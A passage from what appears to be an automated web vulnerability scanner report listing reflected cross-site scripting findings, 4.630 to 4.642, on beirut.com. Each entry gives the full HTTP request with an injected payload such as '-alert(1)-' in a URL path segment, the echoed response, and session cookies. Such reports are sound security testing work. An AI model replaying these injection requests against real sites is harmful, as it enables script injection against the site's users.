Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:20:57 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Online-Internet9f632'-alert(1)-'cf800f69740/Music';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.630. http://www.beirut.com/Online-Internet/Music/4018807677 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Music/4018807677

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3de79'-alert(1)-'f6cd12a9cff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Music3de79'-alert(1)-'f6cd12a9cff/4018807677 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:25:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Online-Internet/Music3de79'-alert(1)-'f6cd12a9cff';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.631. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82e25'-alert(1)-'debe35d86d4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet82e25'-alert(1)-'debe35d86d4/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:26:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet82e25'-alert(1)-'debe35d86d4/Nights-Food-and-Drink';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.632. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4517f"><a>1812591b343 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet4517f"><a>1812591b343/Nights-Food-and-Drink/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet4517f"><a>1812591b343">
...[SNIP]...

4.633. http://www.beirut.com/Online-Internet/Nights-Food-and-Drink/902334694 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Nights-Food-and-Drink/902334694

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54eaf'-alert(1)-'3acb95183ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Nights-Food-and-Drink54eaf'-alert(1)-'3acb95183ae/902334694 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:30:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57668

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Online-Internet/Nights-Food-and-Drink54eaf'-alert(1)-'3acb95183ae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.634. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b1c2"><a>9eca5424fd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet2b1c2"><a>9eca5424fd5/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:12:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet2b1c2"><a>9eca5424fd5">
...[SNIP]...

4.635. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3793c'-alert(1)-'8f530d683c6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet3793c'-alert(1)-'8f530d683c6/Personal-and-Opinion/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:21:10 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet3793c'-alert(1)-'8f530d683c6/Personal-and-Opinion';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.636. http://www.beirut.com/Online-Internet/Personal-and-Opinion/3727967600 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Personal-and-Opinion/3727967600

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1a4d6'-alert(1)-'a9798730560 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Personal-and-Opinion1a4d6'-alert(1)-'a9798730560/3727967600 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:25:31 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internet/Personal-and-Opinion1a4d6'-alert(1)-'a9798730560';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.637. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65fc5'-alert(1)-'382a9161d3a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet65fc5'-alert(1)-'382a9161d3a/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:23:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet65fc5'-alert(1)-'382a9161d3a/Photography-and-Arts';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.638. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload faeae"><a>7bb18f01c4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internetfaeae"><a>7bb18f01c4e/Photography-and-Arts/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:15:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internetfaeae"><a>7bb18f01c4e">
...[SNIP]...

4.639. http://www.beirut.com/Online-Internet/Photography-and-Arts/3885810201 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Photography-and-Arts/3885810201

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 687ed'-alert(1)-'a4afccbfb8b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Photography-and-Arts687ed'-alert(1)-'a4afccbfb8b/3885810201 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:29:15 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Online-Internet/Photography-and-Arts687ed'-alert(1)-'a4afccbfb8b';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.640. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31cf'-alert(1)-'20945d3d02c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internetf31cf'-alert(1)-'20945d3d02c/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:33:14 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Online-Internetf31cf'-alert(1)-'20945d3d02c/Politics-Media-and-News';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.641. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70e27"><a>aed8fb31004 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Online-Internet70e27"><a>aed8fb31004/Politics-Media-and-News/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:26:16 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Online-Internet70e27"><a>aed8fb31004">
...[SNIP]...

4.642. http://www.beirut.com/Online-Internet/Politics-Media-and-News/2845187560 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Online-Internet/Politics-Media-and-News/2845187560

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3016d'-alert(1)-'e2875733136 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Online-Internet/Politics-Media-and-News3016d'-alert(1)-'e2875733136/2845187560 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 07:36:56 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 58488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
